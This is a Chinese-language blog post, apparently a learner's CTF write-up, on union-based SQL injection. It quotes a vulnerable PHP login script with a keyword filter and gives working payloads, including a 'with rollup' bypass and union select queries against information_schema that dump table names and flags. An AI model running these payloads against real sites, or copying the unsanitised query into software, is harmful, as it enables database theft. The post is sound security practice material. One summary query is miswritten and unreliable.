<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Robato Slab:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">





  <link rel="alternate" href="/atom.xml" title="流年、乱了浮生" type="application/atom+xml">






<meta name="description" content="概论联合查询：union可合并两个或多个select语句的结果集，前提是由两条或两条以上的select语句组成，语句之间用关键字union分隔，union中的每个查询的列数必须相同。union会从查询结果集中自动去除了重复行。 利用前提：页面上有显示位。显示位：在一个网站的正常页面，服务端执行SQL语句查询数据库中的数据，客户端将数 据展示在页面中，这个展示数据的位置就叫显示位。 常用函数：">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入&lt;二&gt;-联合查询注入">
<meta property="og:url" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/index.html">
<meta property="og:site_name" content="流年、乱了浮生">
<meta property="og:description" content="概论联合查询：union可合并两个或多个select语句的结果集，前提是由两条或两条以上的select语句组成，语句之间用关键字union分隔，union中的每个查询的列数必须相同。union会从查询结果集中自动去除了重复行。 利用前提：页面上有显示位。显示位：在一个网站的正常页面，服务端执行SQL语句查询数据库中的数据，客户端将数 据展示在页面中，这个展示数据的位置就叫显示位。 常用函数：">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721160138.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721160153.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721170236.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721170544.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721170544.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721170814.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721170544.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721171241.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721171616.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721172252.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721172252.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721172907.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721174412.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721180101.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721180632.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721180928.png">
<meta property="og:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721181153.png">
<meta property="og:updated_time" content="2019-08-06T07:45:48.354Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入&lt;二&gt;-联合查询注入">
<meta name="twitter:description" content="概论联合查询：union可合并两个或多个select语句的结果集，前提是由两条或两条以上的select语句组成，语句之间用关键字union分隔，union中的每个查询的列数必须相同。union会从查询结果集中自动去除了重复行。 利用前提：页面上有显示位。显示位：在一个网站的正常页面，服务端执行SQL语句查询数据库中的数据，客户端将数 据展示在页面中，这个展示数据的位置就叫显示位。 常用函数：">
<meta name="twitter:image" content="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721160138.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/">





  <title>SQL注入<二>-联合查询注入 | 流年、乱了浮生</二></title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">流年、乱了浮生</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">“勿忘初心，方得始终”</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/07/21/SQL注入-二-联合查询注入/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="袁">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/header.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="流年、乱了浮生">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入<二>-联合查询注入</二></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-07-21T14:09:21+08:00">
                2019-07-21
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="概论"><a href="#概论" class="headerlink" title="概论"></a>概论</h2><p><strong>联合查询</strong>：<code>union</code>可合并两个或多个select语句的结果集，前提是由两条或两条以上的select语句组成，语句之间用关键字union分隔，union中的每个查询的列数必须相同。union会从查询结果集中自动去除了重复行。</p>
<p><strong>利用前提</strong>：页面上有显示位。显示位：在一个网站的正常页面，服务端执行SQL语句查询数据库中的数据，客户端将数 据展示在页面中，这个展示数据的位置就叫显示位。</p>
<p><strong>常用函数</strong>：<a id="more"></a></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">group_concat():让查询获得的数据组成一行显示</span><br><span class="line">count():用于统计个数（类似于表的个数，数据库的个数等等）</span><br><span class="line">concat():将多个字符串拼接在一起</span><br></pre></td></tr></table></figure>
<h2 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h2><h3 id="实验吧-因缺思汀的绕过"><a href="#实验吧-因缺思汀的绕过" class="headerlink" title="实验吧 - 因缺思汀的绕过"></a>实验吧 - 因缺思汀的绕过</h3><p>题目地址：<a href="http://www.shiyanbar.com/ctf/1940" target="_blank" rel="noopener">http://www.shiyanbar.com/ctf/1940</a> 解题链接：<a href="http://ctf5.shiyanbar.com/web/pcat/index.php" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/web/pcat/index.php</a></p>
<p>题目内容：访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码，请求，响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQL注入，XSS等相关知识。涉及方向较多。此题主要涉及源码审计，MySQL相关的知识。</p>
<p>打开后，查看源码发现有个注释<code><!--source: source.txt--></code>这应该是源码所在的位置了，访问一下（将source.txt复制到当前地址栏里替换index.php）的确是源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_POST[<span class="string">'uname'</span>]) || !<span class="keyword">isset</span>($_POST[<span class="string">'pwd'</span>])) &#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;form action="" method="post"&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;input name="uname" type="text"/&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;input name="pwd" type="text"/&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;input type="submit" /&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;/form&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;!--source: source.txt--&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</span><br><span class="line">    <span class="keyword">die</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">AttackFilter</span><span class="params">($StrKey,$StrValue,$ArrReq)</span></span>&#123;  </span><br><span class="line">    <span class="keyword">if</span> (is_array($StrValue))&#123;</span><br><span class="line">        $StrValue=implode($StrValue);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (preg_match(<span class="string">"/"</span>.$ArrReq.<span class="string">"/is"</span>,$StrValue)==<span class="number">1</span>)&#123;   </span><br><span class="line">        <span class="keyword">print</span> <span class="string">"水可载舟，亦可赛艇！"</span>;</span><br><span class="line">        <span class="keyword">exit</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$filter = <span class="string">"and|select|from|where|union|join|sleep|benchmark|,|\(|\)"</span>;</span><br><span class="line"><span class="keyword">foreach</span>($_POST <span class="keyword">as</span> $key=&gt;$value)&#123; </span><br><span class="line">    AttackFilter($key,$value,$filter);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$con = mysql_connect(<span class="string">"XXXXXX"</span>,<span class="string">"XXXXXX"</span>,<span class="string">"XXXXXX"</span>);</span><br><span class="line"><span class="keyword">if</span> (!$con)&#123;</span><br><span class="line">	<span class="keyword">die</span>(<span class="string">'Could not connect: '</span> . mysql_error());</span><br><span class="line">&#125;</span><br><span class="line">$db=<span class="string">"XXXXXX"</span>;</span><br><span class="line">mysql_select_db($db, $con);</span><br><span class="line">$sql=<span class="string">"SELECT * FROM interest WHERE uname = '&#123;$_POST['uname']&#125;'"</span>;</span><br><span class="line">$query = mysql_query($sql); </span><br><span class="line"><span class="keyword">if</span> (mysql_num_rows($query) == <span class="number">1</span>) &#123; </span><br><span class="line">    $key = mysql_fetch_array($query);</span><br><span class="line">    <span class="keyword">if</span>($key[<span class="string">'pwd'</span>] == $_POST[<span class="string">'pwd'</span>]) &#123;</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"CTF&#123;XXXXXX&#125;"</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"亦可赛艇！"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	<span class="keyword">print</span> <span class="string">"一颗赛艇！"</span>;</span><br><span class="line">&#125;</span><br><span class="line">mysql_close($con);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>分析下源码（专业点就是源码审计），</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$filter = <span class="string">"and|select|from|where|union|join|sleep|benchmark|,|\(|\)"</span>;</span><br></pre></td></tr></table></figure>
<p>这行代码就是把$filter中的那些SQL注入的关键字给过滤了，那绕过这个限制只需要不用带这些关键字的SQL语句就行，否则网页返回”水可载舟，亦可赛艇！”</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql="<span class="keyword">SELECT</span> * <span class="keyword">FROM</span> interest <span class="keyword">WHERE</span> uname = <span class="string">'&#123;$_POST['</span>uname<span class="string">']&#125;'</span><span class="string">";</span></span><br></pre></td></tr></table></figure>
<p>将uname作为条件输入，然后通过提交的uname去数据库中查询uname和pwd，然后把查询到的pwd和用户输入的pwd再进行对比</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (mysql_num_rows($query) == <span class="number">1</span>)</span><br></pre></td></tr></table></figure>
<p>数据库影响数为1返回结果只能有一条，这是可以使用 limit 的返回来判断数据库中总共有几个人。 可以构造：</p>
<p><code>1’ or 1 limit 1 offset 0#</code>返回“亦可赛艇！”（1个人）</p>
<p><code>1’ or 1 limit 1 offset 1#</code>返回“亦可赛艇！”（两个人）</p>
<p><code>1’ or 1 limit 1 offset 2#</code>返回“一颗赛艇！”（没有第三个人）说明有两个用户</p>
<p>注：<code>limit 1</code>查询一行、<code>offset 2</code>从第二行开始查询</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($key[<span class="string">'pwd'</span>] == $_POST[<span class="string">'pwd'</span>]) &#123;</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"CTF&#123;XXXXXX&#125;"</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"亦可赛艇！"</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>传入的pwd和查询出来的结果一致就输出flag否则报错，使if判断为true得到flag，可以利用<code>group by with rollup</code>，<code>group by with rollup</code>会在统计后的产生一条null信息，然后在pwd里不写值，if就为true了。</p>
<p>注：GROUP&nbsp;BY 语句用于结合聚合函数，根据一个或多个列对结果集进行分组。with&nbsp;rollup详解可以看<a href="https://dev.mysql.com/doc/refman/5.5/en/group-by-modifiers.html" target="_blank" rel="noopener">这里</a></p>
<p>最终payload为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos; or 1 group by pwd with rollup limit 1 offset 2#</span><br></pre></td></tr></table></figure>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721160138.png" alt="1"></p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721160153.png" alt="2"></p>
<p>flag为<code>CTF{with_rollup_interesting}</code></p>
<h3 id="bugkuCTF-这是一个神奇的登录框"><a href="#bugkuCTF-这是一个神奇的登录框" class="headerlink" title="bugkuCTF - 这是一个神奇的登录框"></a>bugkuCTF - 这是一个神奇的登录框</h3><p>题目链接：<a href="http://123.206.87.240:9001/sql/" target="_blank" rel="noopener">http://123.206.87.240:9001/sql/</a></p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721170236.png" alt="3"></p>
<p>先随意输入用户名密码页面返回</p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721170544.png" alt="4"></p>
<p>找注入点，输入1’，页面返回</p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721170544.png" alt="5"></p>
<p>输入1“，页面报错返回</p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721170814.png" alt="6"></p>
<p>说明可以注入，这题按照基本注入步骤就可以了</p>
<p>判断字段个数，输入<code>1”order by 1,2#</code></p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721170544.png" alt="7"></p>
<p>输入<code>1”order by 1,2,3#</code></p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721171241.png" alt="8"></p>
<p>说明有两列</p>
<p>爆库名：输入<code>1” union select database(),2#</code>，得到库名bugkusql1</p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721171616.png" alt="9"></p>
<p>爆表名：输入<code>1” union select table_name,2 from information_schema.tables where table_schema=’bugkusql1’ #</code>，得到表名falg1</p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721172252.png" alt="10"></p>
<p>爆列名（字段）：输入<code>1” union select column_name,2 from information_schema.columns where table_name=’flag1’ #</code>，得到列名flag1</p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721172252.png" alt="11"></p>
<p>查数据：输入<code>1” union select flag1,2 from flag1 #</code>，得到值也就是flag<code>ed6b28e684817d9efcaf802979e57aea</code>，提交时要加上flag{}</p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721172907.png" alt="12"></p>
<h3 id="bugkuCTF-成绩单"><a href="#bugkuCTF-成绩单" class="headerlink" title="bugkuCTF - 成绩单"></a>bugkuCTF - 成绩单</h3><p>题目链接：<a href="http://123.206.87.240:8002/chengjidan/" target="_blank" rel="noopener">http://123.206.87.240:8002/chengjidan/</a></p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721174412.png" alt="13"></p>
<p>与上题思路是一样的，依次输入1，2，3都有输出，输入1‘无回显，输入1’#返回龙龙龙的成绩，所以这是字符型注入。</p>
<p>判断字段个数：输入</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1' order by 1<span class="comment">#</span></span><br><span class="line">1' order by 2<span class="comment">#</span></span><br><span class="line">1' order by 3<span class="comment">#</span></span><br><span class="line">1' order by 4<span class="comment">#</span></span><br></pre></td></tr></table></figure>
<p>都有回显，再往后输入5#时无回显，所以字段数为4</p>
<p>爆库名：输入<code>0’ union select 1,2,3,database()#</code>，不用1是因为id=1我们的东西会被覆盖它会显示龙龙龙的成绩，所以要换一个id，得到库名skctf_flag</p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721180101.png" alt="14"></p>
<p>爆表名：输入<code>0’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#</code>，得到表名fl4g，sc</p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721180632.png" alt="15"></p>
<p>爆列名（字段）：输入<code>0’ union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’fl4g’)#</code>，得到列名skctf_flag</p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721180928.png" alt="16"></p>
<p>查数据：输入<code>0’ union select 1,2,3,skctf_flag from fl4g#</code>，得到值即flag<code>BUGKU{Sql_INJECT0N_4813drd8hz4}</code></p>
<p><img src="/2019/07/21/SQL注入-二-联合查询注入/QQ截图20190721181153.png" alt="17"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>获取数据库名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> schema_name <span class="keyword">from</span> information_schema.schemata</span><br></pre></td></tr></table></figure>
<p>获取表名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables</span><br></pre></td></tr></table></figure>
<p>获取所有列名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> column_name <span class="keyword">from</span> information_schemata.column()</span><br></pre></td></tr></table></figure>
<p><code>information_schema</code>数据库是MySQL自带的，它提供了访问数据库元数据的方式。元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。<br>在MySQL中，把<code>information_schema</code>看作是一个数据库，确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。在<code>information_schema</code>中，有数个只读表，它们实际上是视图，而不是基本表，因此，你将无法看到与之相关的任何文件。</p>
<p><code>information_schema</code>数据库表说明：</p>
<p><code>schemata</code>表：提供了当前mysql实例中所有数据库的信息。show&nbsp;databases的结果取之此表。</p>
<p><code>tables</code>表：提供了关于数据库中的表的信息（包括视图）。详细表述了某个表属于哪个schema，表类型，表引擎，创建时间等信息。show&nbsp;tables&nbsp;from&nbsp;schemaname的结果取之此表。</p>
<p><code>columns</code>表：提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。show&nbsp;columns&nbsp;from&nbsp;schemaname.tablename的结果取之此表。</p>
<p><code>statistics</code>表：提供了关于表索引的信息。show&nbsp;index&nbsp;from&nbsp;schemaname.tablename的结果取之此表。</p>
<p><code>user_privileges</code>（用户权限）表：给出了关于全程权限的信息。该信息源自mysql.user授权表，是非标准表。</p>
<p><code>schema_privileges</code>（方案权限）表：给出了关于方案（数据库）权限的信息。该信息来自mysql.db授权表，是非标准表。</p>
<p><code>table_privileges</code>（表权限）表：给出了关于表权限的信息。该信息源自mysql.tables_priv授权表，是非标准表。</p>
<p><code>column_privileges</code>（列权限）表：给出了关于列权限的信息。该信息源自mysql.columns_priv授权表，是非标准表。</p>
<p><code>character_sets</code>（字符集）表：提供了mysql实例可用字符集的信息。show&nbsp;character set结果集取之此表。</p>
<p><code>collations</code>表：提供了关于各字符集的对照信息。</p>
<p><code>collation_character_set_applicability</code>表：指明了可用于校对的字符集。这些列等效于show&nbsp;collation的前两个显示字段。</p>
<p><code>table_constraints</code>表：描述了存在约束的表。以及表的约束类型。</p>
<p><code>key_column_usage</code>表：描述了具有约束的键列。</p>
<p><code>routimes</code>表：提供了关于存储子程序（存储程序和函数）的信息。此时，routines表不包含自定义函数（udf），名为“mysql.proc&nbsp;name”的列指明了对应于information_schema.routines表的mysql.proc表列。</p>
<p><code>views</code>表：给出了关于数据库中的视图的信息。需要有show&nbsp;views权限，否则无法查看视图信息。</p>
<p><code>triggers</code>表：提供了关于触发程序的信息。必须有super权限才能查看该表</p>
<p>参考文章：<a href="https://blog.csdn.net/xuchen16/article/details/82785371" target="_blank" rel="noopener">https://blog.csdn.net/xuchen16/article/details/82785371</a></p>
<p>可以发现在进行SQL注入时会用到许多SQL函数等，所以掌握SQL注入要多练习正所谓熟能生巧，见得多练得多才能记住每个关键字，函数等的含义和用法。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/20/SQL注入-一-简单注入/" rel="next" title="SQL注入<一>-简单注入">
                <i class="fa fa-chevron-left"></i> SQL注入<一>-简单注入
              </一></a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/26/MISC-二维码图片/" rel="prev" title="MISC-二维码图片">
                MISC-二维码图片 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/header.jpg" alt="袁">
            
              <p class="site-author-name" itemprop="name">袁</p>
              <p class="site-description motion-element" itemprop="description">“初入网络安全攻防，记录一下自己在网络安全道路上的学习经历”</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">17</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#概论"><span class="nav-number">1.</span> <span class="nav-text">概论</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#例题"><span class="nav-number">2.</span> <span class="nav-text">例题</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#实验吧-因缺思汀的绕过"><span class="nav-number">2.1.</span> <span class="nav-text">实验吧 - 因缺思汀的绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#bugkuCTF-这是一个神奇的登录框"><span class="nav-number">2.2.</span> <span class="nav-text">bugkuCTF - 这是一个神奇的登录框</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#bugkuCTF-成绩单"><span class="nav-number">2.3.</span> <span class="nav-text">bugkuCTF - 成绩单</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

